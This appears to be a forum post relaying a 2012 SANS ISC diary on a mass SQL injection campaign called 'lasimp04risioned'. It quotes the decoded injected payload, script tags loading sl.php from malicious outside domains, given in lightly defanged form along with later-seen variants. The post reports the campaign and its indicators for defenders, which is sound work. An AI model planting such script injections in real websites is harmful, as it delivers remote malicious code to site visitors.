FYI...
SQL injection... "lasimp04risioned"
- https://isc.sans.edu/diary.html?storyid=13813
Last Updated: 2012-07-31 21:47:00 UTC - "It's been a while since we published the diary about the lilupophilupop SQL injection ( https://isc.sans.edu/diary.html?storyid=12127 ) that back in January had infected LOTS of web sites. But guess what, they are b-aaa-ck, and are trying pretty much the same thing... decoded looks as...
<script src="http ://lasimp04risioned. rr.nu/sl.php"></script> ...
Searching for the injected "lasimp04risioned" URL via Google shows that the bad guys don't seem to be as 'successful' with this attack as last time, but this can change..."
2012-08-01 11:55:15 UTC: https://isc.sans.edu/diary.html?storyid=13813#comment
(Also seen) ... <script src="http ://xinthesidersdown .com/sl.php"></script> ...
2012-08-02 16:29 UTC: https://isc.sans.edu/diary.html?storyid=13813#comment
... hxxp: //eighbo02rsbarr. rr.nu/sl.php...